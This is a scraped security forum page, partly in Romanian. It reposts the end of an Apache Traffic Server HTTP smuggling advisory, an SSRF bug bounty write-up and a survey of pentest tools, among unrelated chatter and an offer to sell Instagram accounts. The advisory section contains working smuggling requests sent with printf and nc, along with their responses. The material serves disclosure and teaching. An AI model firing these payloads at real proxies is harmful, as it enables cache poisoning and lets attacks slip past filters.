a second query in the first query body, and on cache Hit this body becomes a new query. This sort of query will get one response first (and, yes, that's only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition): 01 GET /index.html?cache=zorg42 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-control: max-age=300\r\n 04 Content-Length: 71\r\n 05 \r\n 06 GET /index.html?cache=zorg43 HTTP/1.1\r\n 07 Host: dummy-host7.example.com\r\n 08 \r\n Line 04 is ignored on cache hit (only after the first run, then), after that line 06 is now a new query and not just the 1st query body. This HTTP query is valid, THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries: Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length] Something HaProxy ATS Nginx |--A----------->| | | | |--A----------->| | | | |--A----------->| | | [cache]<--A--------| | | (etc.) <------| | warmup --------------------------------------------------------- | | | | attack |--A(+B)+C----->| | | | |--A(+B)+C----->| | | | [HIT] | * Bug * | |<--A-----------| | * B 'discovered' * |<--A-----------| |--B----------->| | | |<-B------------| | |<-B------------| | [ouch]<-B----------| | | * wrong resp. * | | |--C----------->| | | |<--C-----------| | [R]<--C----------| | rejected First, we need to init cache, we use port 8001 to get a stream HaProxy->ATS->Nginx. printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 0\r\n'\ '\r\n'\ |nc -q 1 8001 You can run it two times and see that on a second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries, ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here it's the case because we do not use option: http-close on HaProxy (which would prevent usage of pipelines). printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 74\r\n'\ '\r\n'\ 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8001 Query for /victim.html (should be a 404 in our example) gets response for /index.html (X-Location-echo: /index.html?evil=cogip2000). HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:41 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?cache=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 12 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?evil=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Here the issue is critical, especially because there is not invalid syntax in the attacking query. We have an HTTP response splitting, this means two main impacts: ATS may be used to poison or hurt an actor used in front of it the second query is hidden (that's a body, binary garbage for an http actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the Drain the request body if there is a cache hit fix is about. Just to better understand real world impacts, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies... Timeline 2017-12-26: Reports to project maintainers 2018-01-08: Acknowledgment by project maintainers 2018-04-16: Version 7.1.3 with most of the fix 2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs) 2018-08-28: CVE announce 2019-09-17: This article (yes, url date is wrong, real date is september) See also Video Defcon 24: HTTP Smuggling Defcon support Video Defcon demos Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  19. 1 point
    SSRF | Reading Local Files from DownNotifier server Posted on September 18, 2019 by Leon Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago. DownNotifier is an online tool to monitor a website downtime. This tool sends an alert to registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind. Getting XSPA The first thing to do is add http: on “Website URL” field. Select “When the site does not contain a specific text” and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later. The first to alert that a website is being monitored and the second to alert that the website is down but with the response inside an html file. And what is the response…? Getting Local File Read I was excited but that’s not enough to fetch very sensitive data, so I tried the same process but with some uri schemes as file, ldap, gopher, ftp, ssh, but it didn’t work. I was thinking how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with Location header in a PHP file hosted on your own domain. I hosted a php file with the above code and the same process registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was… I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header. Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  20. 1 point
    Stuff Youtube Link : https://www.youtube.com/channel/UC3VydBGBl132baPCLeDspMQ
  21. 1 point
    In lipsa unui avertizor acum in anul 2019 as vrea sa va prezint cateva linkuri legate de subiectul cutremurelor . Sper ca nu ma abat prea tare de la subiect dar poate are legatura cumva . Link-uri utile - web - alerte seism : 1- https://web.telegram.org/#/im?p=@alertaCutremur 2- http://alerta.infp.ro/ 3- https://twitter.com/earthbotro 4- https://twitter.com/incdfp 5- https://twitter.com/cutremurinfo 6- https://www.facebook.com/earthbotro 7- https://www.messenger.com/t/earthbotro Recomand si instalarea in browser , a extensiilor de genul , tab auto refresh . Link Institutul Național de Cercetare-Dezvoltare pentru Fizica Pământului : http://www.infp.ro/ sau www.infp.ro/data/cam-image-320.jpg ( necesita refresh F5 ) Link Alerta Seism : http://alerta.infp.ro/ sau http://resyr.infp.ro/results.php Link seismograf Romania : Link inregistrare live a seismografului MLR : http://www.mobotix.ro/camere_supraveghere_live_ro_928.html Link Mobotix Live Streaming : http://streaming.mobotixtools.com/live/5271f19a1048b Deoarece acum in anul 2019 a evoluat invers situatia si cele doua adrese de mai sus nu mai functioneaza conteaza doar camera ca este d'aia buna de calitate si de 2000 de dolari ( M12D-Sec-DNight ) ... probabil nu trebuie sa o vada toata populimea ce inregistreaza camera de calitate nici nu mai vorbim ... off off off ... Alte link-uri / surse pentru vizionarea seismografului romanesc : https://ecrantv.ro/3852/webcam-observatorul-seismic-muntele-rosu/ sau www.infp.ro/data/cam-image-320.jpg sau 92 87 22 214 ( ''cine stie cunoaste'' ) .
  22. 1 point
  23. 1 point
    Tu crezi ca exista hosteri normali la cap care sa iti vanda tie cu 1$ un vps cu care sa faci 2$ din minat ?:)
  24. 1 point
    Acum m-as gandii sa intarat cu o expresie din asta : Moama ce ti-a zis, eu nu ii permiteam.Dar mai oamenilor haideti sa ne intelelem si noi si sa nu ne mai laudam cu ce avem si ce facem. Toti aici suntem egali, dar poate in viata reala unul este mai sus decat altul.Eu am venit aici sa postez proiecte de ale mele, cat si sa invat ceva.Si eu la primele post-uri am luat Hate , dar nu m-am lasat si am mai postat intre timp cate ceva.Dupa ce ca multii dintre utilizatorii acestui forum ba sunt guest-uri ba sunt utilizatori intregistrati nu multi comenteaza si dau Vote.
  25. 1 point
    Python e interpretat, deci poti arunca un ochi peste cum e facut JS. In JavaScript: The Good Parts cred ca am vazut un exemplu de state machine.
  26. 1 point
    A powerful small guide to deal with Cross-Site Scripting in web applications bug hunting and security assessments Download Link : https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  27. 1 point
  28. 1 point
  29. 1 point
    Ba, urmaresc forumu asta din umbra de ceva timp, nu am mai postat. Dar cat puteti ba sa fiti de terminati? Oare prostia asta a voastra nu are limite? Ce baza de date ba, ca aia era cu persoane de prin anii 90'. 80% din cei care sunt in baza aia de date au murit. Numa invitatii filelist, coduri, dork-uri si baze de date visati. Sa faceti ceva pentru viitoru vostru n-ati face. Ai aici oameni care sunt guru in Linux, care stiu Python si alte lucruri utile si voi cereti baze de date.
  30. 1 point
    Am adaugat suport pentru Windows x64, Linux x86 si Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  31. 1 point
    32/64 bits version Sharing is caring Download link : https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  32. 1 point
    Cam liniste pe aici
  33. 1 point
    Salutare. Am doua conturi deinstagram de vanzare ! 1.Cont instagram cu peste 4300 followers. -Toti adaugati manual. -100% romani. -primeste in jur de 400-1500 likeuri pe post. -Nisa este comedie. -Il puteti transforma in contul vostru personal. -Pret: 40 euro. Nu negociez,acesta este pretul pe piata + am muncit o luna la el...si lucrul cel mai important sunt adaugati manual 2.Cont cu peste 2500 followers. -Adaugati manual -50%romani - 50 straini. -Strange pe post in jur de 300 likeuri. -Nisa fan Inna. Pret:15 euro. Daca le cumparati pe amandoua,le las la 50 euro. Link in pm
  34. 1 point
    Sursa: https://m.habr.com/ru/company/dsec/blog/452836/ Digital Security Company Blog Information Security Network technologies forkyforky may 28 Web tools, or where to start pentester? We continue to talk about useful tools for pentester. In the new article we will look at tools for analyzing the security of web applications. Our colleague BeLove already did a similarselection about seven years ago. It is interesting to see which tools have retained and strengthened their positions, and which have faded into the background and are now rarely used. Note that the Burp Suite also applies here, but there will be a separate publication about it and its useful plugins. Content: Amass Altdns aquatone MassDNS nsec3map Acunetix Dirsearch wfuzz ffuf gobuster Arjun LinkFinder Jsparser sqlmap NoSQLMap oxml_xxe tplmap CeWL Weakpass AEM_hacker Joomscan WPScan Amass Amass is a Go tool for searching and iterating DNS subdomains and mapping an external network. Amass is an OWASP project created to show how organizations on the Internet look to an outsider. Amass gets the names of subdomains in various ways, the tool uses both recursive enumeration of subdomains and search in open sources. To find connected network segments and autonomous system numbers, Amass uses the IP addresses obtained during operation. All found information is used to build a network map. Pros: Information collection techniques include: * DNS - enumeration of subdomains in a dictionary, bruteforce subdomains, “smart” enumeration using mutations based on the found subdomains, reverse DNS requests and search for DNS servers on which it is possible to request a zone transfer request ( AXFR); * Search for open sources - Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo; * Search TLS certificate databases - Censys, CertDB, CertSpotter, Crtsh, Entrust; * Using the API of search engines - BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan; * Search the web archives of the Internet: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback; Integration with Maltego; Provides the most complete coverage for the task of finding DNS subdomains. Minuses: Be careful with amass.netdomains — he will try to access each IP address in the identified infrastructure and obtain domain names from reverse DNS queries and TLS certificates. This is a "loud" technique, it can reveal your intelligence actions in the organization under study. High memory consumption can consume up to 2 GB of RAM in different settings, which will not allow running this tool in the cloud on a cheap VDS. Altdns Altdns is a Python tool for compiling dictionaries for brute force DNS subdomains. Allows you to generate many options for subdomains using mutations and permutations. To do this, use words that are often found in subdomains (for example: test, dev, staging), all mutations and permutations are applied to already known subdomains, which can be submitted to the input of Altdns. The output is a list of variations of subdomains that may exist, and this list can later be used for DNS brute force. Pros: Works well with large data sets. aquatone aquatone - was previously better known as another tool for finding subdomains, but the author himself abandoned this in favor of the aforementioned Amass. Now aquatone is rewritten to Go and more geared for pre-exploration of websites. To do this, aquatone passes through the specified domains and searches for websites on different ports, after which it collects all the information about the site and makes a screenshot. Convenient for quick preliminary exploration of websites, after which you can select priority targets for attacks. Pros: At the output, it creates a group of files and folders that are conveniently used for further work with other tools: * HTML report with collected screenshots and response headers grouped by similarity; * File with all the URLs on which the websites were found; * File with statistics and data page; * Folder with files containing the response headers from the found targets; * Folder with files containing the response body from the found targets; * Screenshots of found websites; Supports work with XML reports from Nmap and Masscan; Uses headless chrome / chromium for screenshots rendering. Minuses: It may attract the attention of intrusion detection systems, and therefore requires adjustment. The screenshot was made for one of the old versions of aquatone (v0.5.0), in which the search for DNS subdomains was implemented.Older versions can be found on the release page. Screenshot aquatone v0.5.0 MassDNS MassDNS is another tool for finding DNS subdomains. Its main difference is that it makes DNS queries directly to many different DNS resolvers and does so with considerable speed. Pros: Fast - able to resolve more than 350 thousand names per second. Minuses: MassDNS can cause a significant load on the DNS resolvers used, which can lead to a ban on these servers or complaints to your provider. In addition, it will cause a large load on the company's DNS servers, if they have them and if they are responsible for the domains you are trying to resolve. The list of resolvers is currently outdated, but if you select broken DNS resolvers and add new known ones, everything will be fine. nsec3map nsec3map is a Python tool to get a complete list of DNSSEC protected domains. Pros: Quickly detects hosts in DNS zones with a minimal number of queries if DNSSEC support is enabled in the zone; As part of the plugin for John the Ripper, which can be used to crack the resulting NSEC3 hashes. Minuses: Many DNS errors are handled incorrectly; There is no automatic parallelization of processing NSEC records - you have to split the namespace manually; High memory consumption. Acunetix Acunetix is a web vulnerability scanner that automates the process of checking web application security. Tests the application for SQL injection, XSS, XXE, SSRF, and many other web vulnerabilities. However, just like any other scanner of multiple web vulnerabilities does not replace the pentester, since complex chains of vulnerabilities or vulnerabilities in logic cannot be found. But it covers a lot of different vulnerabilities, including different CVEs, which the pentester could have forgotten, therefore, it is very convenient to get rid of routine checks. Pros: Low level of false positives; Results can be exported as reports; Performs a large number of checks for different vulnerabilities; Parallel scanning of multiple hosts. Minuses: There is no de-duplication algorithm (Acunetix pages that are of the same functionality will be considered different, because different URLs lead to them), but the developers are working on it; Requires installation on a separate web server, which makes it difficult to test client systems with a VPN connection and use the scanner in an isolated segment of the local client network; It can “rustle” the service under study, for example, send too many attacking vectors to the communication form on the site, thereby greatly complicating business processes; It is a proprietary and, accordingly, non-free solution. Dirsearch Dirsearch is a Python tool for brute force directories and files on websites. Pros: It can distinguish real “200 OK” pages from “200 OK” pages, but with the text “page not found”; Comes with a handy dictionary that has a good balance between size and search efficiency. Contains standard paths typical of many CMS and technology stacks; Its dictionary format, which allows to achieve good efficiency and flexibility of searching files and directories; Convenient output - plain text, JSON; Able to do throttling - a pause between requests, which is vital for any weak service. Minuses: Extensions must be passed as a string, which is inconvenient if you need to transfer many extensions at once; In order to use your dictionary, it will need to be slightly modified to the format of the Dirsearch dictionaries for maximum efficiency. wfuzz wfuzz - Python-fazzer web applications.Probably one of the most famous web phasers.The principle is simple: wfuzz allows phasing any place in an HTTP request, which allows phasing of GET / POST parameters, HTTP headers, including Cookies and other authentication headers. At the same time, it is convenient for simple brute force directories and files, for which you need a good dictionary. It also has a flexible filter system, with which you can filter the responses from the website by different parameters, which allows you to achieve effective results. Pros: Multifunctional - modular structure, assembly takes several minutes; Convenient filtering and fuzzing mechanism; You can phase out any HTTP method, as well as any place in the HTTP request. Minuses: In the state of development. ffuf ffuf - a web-fazer on Go, created in a similar fashion to wfuzz, allows files, directories, URL paths, names and values of GET / POST parameters, HTTP headers, including the Host header for virtual hosts brute-force. Wfuzz differs from its colleague by higher speed and some new features, for example, Dirsearch format dictionaries are supported. Pros: Filters are similar to wfuzz filters, allow flexible configuration of brute force; Allows fuzzing HTTP header values, data from POST requests and various parts of the URL, including the names and values of GET parameters; You can specify any HTTP method. Minuses: In the state of development. gobuster gobuster - a tool for Go for intelligence, has two modes of operation. The first one is used for brute-force files and directories on the website, the second one is used to iterate over the DNS subdomains. The tool initially does not support recursive enumeration of files and directories, which, of course, saves time, but on the other hand, the brute force of each new endpoint on the website needs to be launched separately. Pros: High speed for both brute force DNS subdomains, and for brute force files and directories. Minuses: The current version does not support the installation of HTTP headers; By default, only some of the HTTP status codes (200,204,301,302,307) are considered valid. Arjun Arjun is a tool for brute-force hidden HTTP parameters in GET / POST parameters, as well as in JSON. The built-in dictionary has 25,980 words that Ajrun checks in almost 30 seconds.The trick is that Ajrun does not check each parameter separately, but checks immediately ~ 1000 parameters at a time and looks to see if the answer has changed. If the answer has changed, then divides this 1000 parameters into two parts and checks which of these parts affects the answer. Thus, using a simple binary search, a parameter or several hidden parameters are found that influenced the answer and, therefore, can exist. Pros: High speed due to binary search; Support for GET / POST parameters, as well as parameters in the form of JSON; By the same principle, the Burp Suite plugin also works - param-miner , which is also very good at finding hidden HTTP parameters. We will tell you more about it in the upcoming article about Burp and its plugins. LinkFinder LinkFinder is a Python script for searching links in JavaScript files. Useful for finding hidden or forgotten endpoints / URLs in a web application. Pros: Fast; There is a special plugin for Chrome based on LinkFinder. . Minuses: Inconvenient final conclusion; Does not analyze JavaScript in dynamics; Quite simple link search logic - if JavaScript is obfuscated in some way, or the links are initially missing and dynamically generated, you will not be able to find anything. Jsparser JSParser is a Python script that uses Tornadoand JSBeautifier to analyze relative URLs from JavaScript files. Very useful for detecting AJAX requests and compiling a list of API methods with which the application interacts. Effectively paired with LinkFinder. Pros: Quick parsing javascript files. sqlmap sqlmap is probably one of the most well-known tools for analyzing web applications. Sqlmap automates the search and operation of SQL injections, works with several SQL dialects, has in its arsenal a huge number of different techniques, ranging from quotes head-on and ending with complex vectors for time-based SQL injections. In addition, it has many techniques for further exploitation for various DBMS, therefore, it is useful not only as a scanner for SQL injections, but also as a powerful tool for exploiting already found SQL injections. Pros: A large number of different techniques and vectors; Low number of false positives; Many possibilities for fine tuning, various techniques, target database, tamper scripts for bypassing WAF; Ability to create dump output data; Many different operating possibilities, for example, for some databases - automatic file upload / download, command execution ability (RCE) and others; Support for direct connection to the database using the data obtained during the attack; At the entrance, you can submit a text file with the results of the work Burp - no need to manually compile all the attributes of the command line. Minuses: It is difficult to customize, for example, to write some of your checks due to poor documentation for this; Without the appropriate settings conducts an incomplete set of checks, which can be misleading. NoSQLMap NoSQLMap is a Python tool for automating the search and operation of NoSQL injection. It is convenient to use not only in NoSQL databases, but also directly when auditing web applications using NoSQL. Pros: As well as sqlmap, it allows not only to find a potential vulnerability, but also checks the possibility of its exploitation for MongoDB and CouchDB. Minuses: Does not support NoSQL for Redis, Cassandra, is being developed in this direction. oxml_xxe oxml_xxe is a tool for embedding XXE XML exploits into various file types that use an XML format in some form. Pros: It supports many common formats, such as DOCX, ODT, SVG, XML. Minuses: Not fully supported PDF, JPEG, GIF; Creates only one file. To solve this problem, you can use the docem tool , which can create a large number of files with paylodes in different places. The aforementioned utilities do an excellent job with XXE testing when loading documents containing XML. But also do not forget that XML format handlers can occur in many other cases, for example, XML can be used as a data format instead of JSON. Therefore, we recommend to pay attention to the following repository containing a large variety of payloads: PayloadsAllTheThings . tplmap tplmap is a Python tool to automatically detect and exploit Server-Side Template Injection vulnerabilities. It has settings similar to sqlmap and flags. It uses several different techniques and vectors, including blind-injections, and also has techniques for executing code and loading / unloading arbitrary files. In addition, it has in its arsenal techniques for a dozen different engines for templates and some techniques for searching eval () - like code injections in Python, Ruby, PHP, JavaScript. In case of successful operation, opens an interactive console. Pros: A large number of different techniques and vectors; Supports many engines for rendering templates; A lot of maintenance techniques. CeWL CeWL is a Ruby dictionary generator, created to extract unique words from a specified website, following links on a website to a specified depth.Compiled dictionary of unique words can be used later for brute-force passwords on services or brute-force files and directories on the same web site, or to attack hashes obtained using hashcat or John the Ripper. Useful in compiling a “target” list of potential passwords. Pros: Easy to use. Minuses: You need to be careful with the depth of search, so as not to capture an extra domain. Weakpass Weakpass is a service containing many dictionaries with unique passwords. It is extremely useful for various tasks related to password cracking, ranging from simple online brute-force accounts to target services, ending off-line brute-force hashes obtained usinghashcat or John The Ripper . There are about 8 billion passwords in length from 4 to 25 characters. Pros: Contains both specific dictionaries and dictionaries with the most common passwords - you can choose a specific dictionary for your own needs; Dictionaries are updated and updated with new passwords; Dictionaries are sorted by efficiency. You can choose the option for quick online brute, as well as for a detailed selection of passwords from the extensive dictionary with the latest leaks; There is a calculator showing the time for password brutus on your hardware. In a separate group, we would like to bring the tools for CMS checks: WPScan, JoomScan and AEM hacker. AEM_hacker AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications. Pros: Can detect AEM-applications from the list of URLs submitted to the entrance; It contains scripts for obtaining RCE by loading a JSP shell or using SSRF. Joomscan JoomScan is a Perl tool to automate the detection of vulnerabilities when deploying a Joomla CMS. Pros: Able to find configuration flaws and problems with admin settings; Lists Joomla versions and related vulnerabilities, similar for individual components; Contains more than 1000 exploits for Joomla components; The output of final reports in text and HTML-formats. WPScan WPScan - a tool for scanning sites on WordPress, has in its arsenal vulnerabilities for the WordPress engine itself, as well as for some plugins. Pros: Able to list not only unsafe WordPress plugins and themes, but also to get a list of users and TimThumb files; Can conduct brute force attacks on WordPress sites. Minuses: Without the appropriate settings conducts an incomplete set of checks, which can be misleading. In general, different people prefer different tools for work: they are all good in their own way, and what one person liked, may not suit another. If you think that we have undeservedly bypassed some good utility, write about it in the comments! +43 3748 +43 11.3k374 20 Karma 56,8 Rating @forkyforky User 6 subscribers Share publication Comments 8 Открой дропшиппингмагазинДропшиппинг сотрудничество. Открывай свой магазин с популярными товарами у нас!Дропшиппинг сотрудничество. Открывай свой магазин с популярными товарами у нас!azimut-shop17.tkПерейтиЯндекс.Директ RELATED PUBLICATIONS December 30, 2015 Security of web resources of banks of Russia August 24, 2015 SCADA and mobile phones: safety assessment of applications that turn a smartphone into a plant control panel September 24, 2013 Information security in Australia, and why pentest there is no longer a cake POPULAR PER DAY yesterday at 10:10 Akihabara: Otaku nesting site yesterday at 01:22 PHP Digest number 157 (May 20 - June 3, 2019) yesterday at 14:22 GandCrab authors stop working: they claim they stole enough 2 June About the engineering approach I put in a word yesterday at 14:24 How we made a safe deal for freelance: give a choice, cut features, compare commissions Language settings Full version 2006-2019 © « TM »
  35. 1 point
    Zi bossul meu unde vrei sa termini mankatias pulicica ta ca iti fac ce diploma vrea sufletelul tau.
  36. 1 point
    Poti gasi aici.La fiecare refresh, iti da alt hec.
  37. 1 point
    contactme bro im have good software and use is free!!
  38. 1 point
    Ok, cam rar vad lumea pe aici sa accepte critica si sa o vada ca pe ceva constructiv, deci bravo, inceput bun. Nu am vrut sa imi pierd vremea initial dar acum poate ca se va prinde ceva. Sfaturi (de luat cu putina sare, nu sunt expert in domeniu dar trecut prin anumite procese similare): 1. Scoate hyperlink-ul la site-ul tau din acest thread, nu te pune intr-o lumina pozitiva. Cineva care vrea sa vada cu cine are de a face inainte sa dea un ban si te cauta pe Google, va vedea ca tu esti in situatia celor pe care vrei sa-i ajuti dar tu nu esti in stare sa te ajuti pe tine insuti. Blind leading the blind if you catch my drift. Adica sa zicem ca tu esti o firma mica si vrei sa iti "maximizezi veniturile prin soluții tehnice" dupa cum spui mai sus, incluzand "marketing online" si "plan de dezvoltare" dupa cum spui pe site, tu tocmai de astea duci lipsa in momentul actual si te gandeai sa spamezi lumea in lipsa de alte idei. Daca o alta firma mica te plateste sa ii promovezi ce faci? Te apuci si spamezi pe altii pentru ei? Anyway, lasand la o parte ironia situatiei in care esti, sa revin la ceva cat de cat mai constructiv: 2. Trebuie sa scoti in evidenta din primele secunde cand cineva intra in contact cu tine/site-ul tau (nu se poate vorbi momentan de "brand") si anume cu ce esti diferit (in sens bun) fata de restul 'nspe mii de pulifrici/e care se dau experti, de ce se merita in primul rand sa petreaca timp sa te asculte (time is money) si apoi de ce sa iti dea bani. Cu alte cuvinte care este USP-ul tau? (Unique Selling Point). Apoi clientul sa inteleaga rapid cum poti folosi acel USP sa ii ajuti pe ei. Site-ul e foarte generic si "rece", nu reiese exact si concret ce oferi si cum si cum ii ajuti specific pe potentialii clienti. 3. Cunoaste-ti competitia, fa-ti temele de casa. Uita-te sa vezi cu cine ai rivaliza pe nisa ta. Uita-te sa vezi ce fac ei bine (dpdv al site-ului si cum se promoveaza) si incearca sa adaptezi (nu copiezi) la contextul tau. Uita-te sa vezi ce le lipseste (considera-te ca ai fi un potential client) si ce nu iti place, ce te-ar convinge sa le devii client, etc. si actioneaza ca atare in afacerea ta. Fa si un mic test cu prietenii, neamurile, familia, etc. si intreaba-i sa se considere mici antreprenori, etc. da-le un context al clientului tau ideal si apoi sa iti dea o privire onesta daca ar apela la serviciile tale ori la altii, ce i-ar convinge sa vina la tine, etc. 4. Cunoaste-ti mediul de operare si anume Romania - cultura in care operezi si anume in astfel de circumstante se merge inca foarte mult pe recomandari, din vorba buna a primilor clienti. In alte tari lumea se uita pe site-uri de rating-uri sau cum era pe vremuri yelp/yellow pages, etc. La inceput e nevoie sa iti creezi o baza puternica de sustinere si financiara dar si din punct de vedere al testimonialului. Pe langa relatia care trebuie sa o dezvolti, pe site trebuie sa explici concrect din acest punct de vedere ce ai facut tu sa inteleaga si ultimul bou. Ca ai pus niste "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" e fix pielea pulii, are 0 credibilitate, poti scrie fraze de genul si adauga nume si locatii nelimitate. Daca te uiti pe site-urile profesioniste au "studii de caz". Acestea trebuie pastrate succint si in metoda STAR (Situation, Task, Action, Result). Adica ce probleme avea clientul de a apelat la tine (in acest fel potentialii clienti se identifica / raporteaza mai usor si se vad in pielea celor care au apelat la tine). Apoi ce ti-au dat tie sa faci (in subconstient asta le arata ca pot avea incredere in tine cu x, y, z.). Cum ai actionat (aici ai oportunitate de promovare sa arati cat de creativ esti, etc.) si apoi rezultatul (aici e punctul final de "vanzare" unde il convinge pe Badea din deal ca si ei pot avea acelasi rezultat sau mai bun daca apeleaza la serviciile tale). Am avut firme in trecut care mi-au oferit discount-uri considerabile in schimbul a unor astfel de cazuri de studiu sau testimoniale de genul. Acestea pot fi in ceva grafic si succint intr-un pdf sau un clip foarte scurt, sau combinat, etc. in functie de necesitate. 5. Pune-te la punct cu toate metodele eficiente (dpdv al timpului, costului, etc. inclusiv care sunt slabiciunile acestora) de a oferi ce vrei tu sa oferi. Nu vreau sa reiau punctul 1 de mai sus dar trebuie sa stii meserie daca vrei sa supravietuiesti. Este un process continuu, nu vei stii deajuns niciodata, dar orice client trebuie sa vada ca iti cunosti domeniul. Habarnistii supravietuiesc doar de pe prosti care nu stiu mai bine. Nu ma intelege gresit, se pot face bani multi si de pe prosti (ex: https://www.fiverr.com/gabonne) dar banuiesc ca nu vrei sa te axezi pe "nisa" asta. Tu spui ca oferi Suport IT, Marketing online, Identificare brand, Creare de aplicatii, Plan de dezvoltare. - din punctul meu de vedere la asta ajungi in timp cand ai un minim 50 angajati. Daca cineva vine de exemplu la tine si vrea sa le oferi toata gama pentru o firma mica de termopane ce faci, le pierzi timpul si banii sau ii refuzi ca habar nu ai? De exemplu daca pe langa un intranet in firma vrea solutii de back-ups zilnic, o aplicatie bespoke de CRM, plati, furnizori, etc. + plan de dezvoltare online, etc. Trebuie sa ai capabilitatea sa oferi ceea ce spui ca oferi. Si in ziua de azi lumea ca sa te pastreze ca si furnizor asteapta si sfaturi (mini-consultanta) in domeniu care vin cu produsul sa vada ca iti pasa de ei. De exemplu le spui uite putem face cum spui tu (full-back up zilnic de ex) dar poti face si incremental (e mai rapid, cost-efficient, etc.). In astfel de domenii devii si un fel de consultant si daca nu ai habar de ce vorbesti doar le pierzi vremea si banii si apoi iti iei talpa. Axeaza-te pe ceva ce stii foarte bine si apoi poti sa cresti organic. Poti sa legi colaborari cu altii care se pricep in alte domenii - cu cat colaborezi mai bine cu atat iesi mai ok. Cam atat deocamdata referitor la site si la tine... cand/daca mai am chef o sa scriu ceva si de idei de promovare..
  39. 1 point
    :))))))) vai de pl. noastra
  40. 1 point
  41. 1 point
    Ceva nou: hackyard. Ceva etic: hackpedia Ceva bun: RST Comparati si voi. Cam asta imi placea aici, partea de blackhat. Asa inveti mult mai multe decat pe partea etica. Libertate. Partea cu parolele suna bine, o sa vad ce facem zilele astea, inca nu e totul gata. Si am mai multe idei.
  42. 0 points
    Vreau sa inchid contul pe Romanian Security Team Security, cum procedez?
  43. 0 points
    Care-va stie ca-ti dam la mumu, pune mana la munca futu-te-n gura de antisocial. Stati toata ziua pe banii parintilor si vreti totul gratis.
  44. 0 points
    Recomand xda cum a zis QKQL cauta un tutorial cu reviews pozitive ca daca il faci gresit root-u o sa stai 2-3-4 zile poate sa il faci inapoi ^^
  45. -1 points
    SEO, Benone mai respiri? Ai pe aici categoria de blog
  46. -2 points
